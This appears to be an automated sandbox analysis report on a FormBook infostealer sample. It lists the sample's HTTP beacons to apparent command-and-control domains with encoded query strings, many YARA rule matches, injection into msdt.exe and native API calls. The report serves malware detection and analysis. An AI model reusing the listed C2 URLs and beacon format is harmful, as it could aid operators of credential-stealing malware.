          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1Host: www.arsels.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1Host: www.electricatrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1Host: www.vupeliquid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C15C240_2_00C15C24
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_013D82500_2_013D8250
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_013DD2F80_2_013DD2F8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_013DD2E80_2_013DD2E8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041BA027_2_0041BA02
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00408C7C7_2_00408C7C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041CC387_2_0041CC38
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00408C807_2_00408C80
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041C5297_2_0041C529
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041BD307_2_0041BD30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00402D877_2_00402D87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E65C247_2_00E65C24
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EF9007_2_018EF900
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019041207_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB0907_2_018FB090
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A07_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B20A87_2_019B20A8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B28EC7_2_019B28EC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A10027_2_019A1002
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191EBB07_2_0191EBB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019ADBD27_2_019ADBD2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B2B287_2_019B2B28
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B22AE7_2_019B22AE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019125817_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B25DD7_2_019B25DD
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FD5E07_2_018FD5E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B2D077_2_019B2D07
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E0D207_2_018E0D20
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B1D557_2_019B1D55
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F841F7_2_018F841F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AD4667_2_019AD466
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B1FF17_2_019B1FF1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B2EF77_2_019B2EF7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AD6167_2_019AD616
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01906E307_2_01906E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047ED46613_2_047ED466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473841F13_2_0473841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1D5513_2_047F1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04720D2013_2_04720D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F2D0713_2_047F2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E013_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F25DD13_2_047F25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475258113_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04746E3013_2_04746E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047ED61613_2_047ED616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F2EF713_2_047F2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1FF113_2_047F1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E100213_2_047E1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F28EC13_2_047F28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A013_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F20A813_2_047F20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B09013_2_0473B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474412013_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472F90013_2_0472F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F22AE13_2_047F22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F2B2813_2_047F2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EDBD213_2_047EDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475EBB013_2_0475EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D02FB013_2_02D02FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D08C8013_2_02D08C80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D08C7C13_2_02D08C7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1CC3813_2_02D1CC38
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D02D9013_2_02D02D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D02D8713_2_02D02D87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: String function: 018EB150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0472B150 appears 35 times
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004185E0 NtCreateFile,7_2_004185E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00418690 NtReadFile,7_2_00418690
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00418710 NtClose,7_2_00418710
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004187C0 NtAllocateVirtualMemory,7_2_004187C0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004185DA NtCreateFile,7_2_004185DA
